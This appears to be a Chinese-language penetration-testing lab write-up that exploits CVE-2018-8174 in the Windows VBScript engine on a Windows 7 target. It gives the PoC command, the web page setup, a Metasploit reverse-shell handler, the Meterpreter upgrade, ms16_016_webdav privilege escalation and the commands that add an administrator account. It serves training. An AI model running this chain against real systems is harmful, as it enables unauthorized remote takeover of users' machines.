实验目的
通过获取普通用户shell进行提权管理权限
实验目的 通过获取普通用户shell进行提权管理权限 实验原理 * Microsoft Windows 7等都是美国微软(Microsoft)公司发布的一系列操作系统。Windows VBScript engine是其中的一个VBScript(脚本语言)引擎。Microsoft Windows VBScript引擎中存在远程代码执行漏洞。远程攻击者可利用该漏洞在当前用户的上下文中执行任意代码,造成内存损坏
实验环境 1.操作系统 操作机:kali 实验步骤 步骤1:使用poc获取shell 1.1.进入目录,使用python编译文件,此处-i为攻击机ip python CVE-2018-8174.py -u http://10.143.0.14/exploit.html -o msf.rtf -i 10.143.0.14 -p 4444 图1 1.2.复制文件,重启web服务 cp exploit.html /var/www/html service apache2 restart 图2 1.3.切换到操作机,进入控制面板创建新的用户并切换到新的用户(目的为获取到普通用户的shell后面进行提权) 图3 图4 1.4.切换到操作机使用metasploit获取目标机shell msfconsole use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.143.0.14 exploit 图5 1.6.目标机win7使用IE浏览器访问10.143.0.14/exploit.html,在IE中打开恶意链接后,虽然页面显示打开失败,但是实际攻击已经成功,kali机获得返回的shell。 图6 1.6.打开返回的shell,输入chcp 65001 清除乱码 图7 步骤2:shell升级 2.1.尝试添加新用户发现指令被拒绝,说明当前用户权限太低。 net user hy 123456 /add 图8 2.2.将shell转到后台,注意这里是session 2 ctrl +z y sessions -l 图9 2.3.载入转换模块开始攻击 use post/multi/manage/shell_to_meterpreter set SESSION 2 run 图10 2.4.查看是否出现新SESSION并进入,并查看权限 sessions -l sessions -i 3 getsystem 图11 步骤3:漏洞提权 3.1.使用background将sessions3放到后台,配合其他漏洞进行提权 background use exploit/windows/local/ms16_016_webdav set SESSION 3 exploit exploit 图12 3.3.,查看uid getuid 图13 3.4.输入shell,添加新用户并赋予管理员权限 shell net user hy 123 /add net localgroup administrators hy /add 图14 3.5.切换到目标机查看是否添加成功 图15
用户:root
密码:123456
目标机:win7